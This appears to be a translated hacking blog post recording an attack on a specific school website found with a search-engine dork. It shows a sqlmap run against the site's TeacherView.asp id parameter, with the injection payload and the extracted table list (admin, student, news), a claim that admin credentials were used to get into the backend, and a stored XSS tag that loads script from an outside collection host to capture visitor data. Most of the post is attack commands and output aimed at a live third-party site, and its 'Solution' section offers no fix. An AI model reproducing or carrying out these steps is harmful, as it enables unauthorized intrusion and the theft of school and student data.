A school management system vulnerability package (including XSS storage-SQL Injection Vulnerabilities)

A school management system vulnerability package (including XSS storage-SQL Injection Vulnerabilities)

"School website system"

This is a keyword. You can add. Or not! Baidu found

 

Okay .. Let's do this first... Get injection exists?

[root@Hacker~]# Sqlmap sqlmap -u "http://www.tajx.com/TeacherView.asp?id=12"    sqlmap/1.0-dev - automatic SQL injection and database takeover tool    http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 20:18:40[20:18:40] [INFO] testing connection to the target url[20:18:41] [INFO] testing if the url is stable, wait a few seconds[20:18:43] [WARNING] url is not stable, sqlmap will base the page comparison ona sequence matcher. If no dynamic nor injectable parameters are detected, or incase of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match onhow do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit][20:18:46] [INFO] testing if GET parameter 'id' is dynamic[20:18:46] [INFO] confirming that GET parameter 'id' is dynamic[20:18:47] [WARNING] GET parameter 'id' appears to be not dynamic[20:18:47] [INFO] heuristics detected web page charset 'GB2312'[20:18:47] [WARNING] reflective value(s) found and filtering out[20:18:47] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access)[20:18:47] [INFO] testing for SQL injection on GET parameter 'id'[20:18:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[20:18:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectableparsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n][20:18:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[20:18:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found[20:19:22] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:19:33] [INFO] checking if the injection point on GET parameter 'id' is a false positiveGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 30 HTTP(s) requests:---Place: GETParameter: id    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=12 AND 5910=5910---[20:20:11] [INFO] testing Microsoft Access[20:20:12] [INFO] confirming Microsoft Access[20:20:13] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[20:20:13] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 30 times[20:20:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[20:20:13] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tajx.com'[*] shutting down at 20:20:13

 

Use a D to view the account and password and then enter the background .. Prepare for further research! Then I saw one at the front-end.

Write XSS code:

<script src="http://xss.esotsec.org/?u=57a23e" > </script>

Click to view

Although Blank

However, the XSS testing platform has received the information

 

 

[20:51:48] [INFO] tried 1184/3144 items (38%)[20:52:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:52:22] [INFO] tried 1201/3144 items (38%)[20:52:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:53:09] [INFO] retrieved: school[20:53:45] [INFO] tried 1268/3144 items (40%)[20:54:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:55:37] [INFO] tried 1365/3144 items (43%)[20:55:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:56:14] [INFO] tried 1383/3144 items (44%)[20:56:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:56:55] [INFO] tried 1403/3144 items (45%)[20:57:16] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:57:33] [INFO] tried 1426/3144 items (45%)[20:57:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:58:11] [INFO] tried 1461/3144 items (46%)[20:58:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:58:38] [INFO] tried 1469/3144 items (47%)[20:58:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[20:59:58] [INFO] tried 1541/3144 items (49%)[21:00:19] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:00:37] [INFO] tried 1566/3144 items (50%)[21:00:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:01:09] [INFO] tried 1570/3144 items (50%)[21:01:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:01:43] [INFO] tried 1587/3144 items (50%)[21:02:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:02:31] [INFO] tried 1629/3144 items (52%)[21:02:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:02:57] [INFO] tried 1639/3144 items (52%)[21:03:18] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:03:22] [INFO] tried 1648/3144 items (52%)[21:03:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:04:10] [INFO] tried 1690/3144 items (54%)[21:04:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:04:55] [INFO] tried 1729/3144 items (55%)[21:05:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:05:19] [INFO] tried 1736/3144 items (55%)[21:05:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:05:50] [INFO] tried 1755/3144 items (56%)[21:06:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:07:40] [INFO] tried 1836/3144 items (58%)[21:08:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:08:28] [INFO] tried 1879/3144 items (60%)[21:08:49] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:08:52] [INFO] tried 1882/3144 items (60%)[21:09:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:10:37] [INFO] tried 1962/3144 items (62%)[21:10:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:11:10] [INFO] tried 1984/3144 items (63%)[21:11:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:11:43] [INFO] tried 1997/3144 items (64%)[21:12:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:12:37] [INFO] tried 2032/3144 items (65%)[21:12:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:13:14] [INFO] tried 2050/3144 items (65%)[21:13:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:13:48] [INFO] tried 2067/3144 items (66%)[21:14:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:14:19] [INFO] tried 2084/3144 items (66%)[21:14:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:14:52] [INFO] tried 2098/3144 items (67%)[21:15:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:15:21] [INFO] tried 2121/3144 items (67%)[21:15:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:16:25] [INFO] tried 2157/3144 items (69%)[21:16:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:17:14] [INFO] tried 2189/3144 items (70%)[21:17:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:18:02] [INFO] tried 2198/3144 items (70%)[21:18:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:18:42] [INFO] tried 2223/3144 items (71%)[21:19:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:19:12] [INFO] tried 2237/3144 items (71%)[21:19:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:19:48] [INFO] tried 2262/3144 items (72%)[21:20:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:20:18] [INFO] tried 2277/3144 items (72%)[21:20:39] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:20:51] [INFO] tried 2301/3144 items (73%)[21:21:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:21:40] [INFO] tried 2334/3144 items (74%)[21:22:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:22:24] [INFO] tried 2363/3144 items (75%)[21:22:45] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:23:23] [INFO] tried 2404/3144 items (76%)[21:23:44] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:24:02] [INFO] tried 2435/3144 items (77%)[21:24:32] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request[21:24:50] [INFO] tried 2459/3144 items (78%)[21:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:25:33] [INFO] tried 2495/3144 items (79%)[21:25:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:26:07] [INFO] tried 2503/3144 items (80%)[21:26:28] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:26:58] [INFO] tried 2538/3144 items (81%)[21:27:19] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:27:42] [INFO] tried 2565/3144 items (82%)[21:28:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:28:23] [INFO] tried 2579/3144 items (82%)[21:28:44] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:29:14] [INFO] tried 2619/3144 items (83%)[21:29:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:30:05] [INFO] tried 2642/3144 items (84%)[21:30:26] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:30:37] [INFO] tried 2654/3144 items (84%)[21:30:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:31:04] [INFO] tried 2670/3144 items (85%)[21:31:25] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:31:51] [INFO] tried 2705/3144 items (86%)[21:32:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:32:41] [INFO] tried 2727/3144 items (87%)[21:33:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:33:09] [INFO] tried 2737/3144 items (87%)[21:33:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:33:40] [INFO] tried 2753/3144 items (88%)[21:34:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:34:19] [INFO] tried 2774/3144 items (88%)[21:34:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:35:02] [INFO] tried 2802/3144 items (89%)[21:35:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:35:34] [INFO] tried 2822/3144 items (90%)[21:36:04] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request[21:36:19] [INFO] tried 2845/3144 items (90%)[21:36:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:37:11] [INFO] tried 2869/3144 items (91%)[21:37:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:37:40] [INFO] tried 2891/3144 items (92%)[21:38:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:38:27] [INFO] tried 2920/3144 items (93%)[21:38:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:39:11] [INFO] tried 2950/3144 items (94%)[21:39:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:39:35] [INFO] tried 2955/3144 items (94%)[21:39:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:40:53] [INFO] tried 3006/3144 items (96%)[21:41:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:41:27] [INFO] tried 3025/3144 items (96%)[21:41:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:42:10] [INFO] tried 3050/3144 items (97%)[21:42:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:42:44] [INFO] tried 3059/3144 items (97%)[21:43:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:43:30] [INFO] tried 3104/3144 items (99%)[21:43:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[21:44:14] [INFO] tried 3133/3144 items (100%)[21:44:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requestDatabase: Microsoft_Access_masterdb[6 tables]+----------+| admin    || feedback || menu     || news     || school   || student  |+----------+[21:44:46] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 3142 times[21:44:46] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tajx.com'[*] shutting down at 21:44:46

 

Solution:

Prepare for further research! It is best to refine or obtain a certificate if you give me more rank .. Haha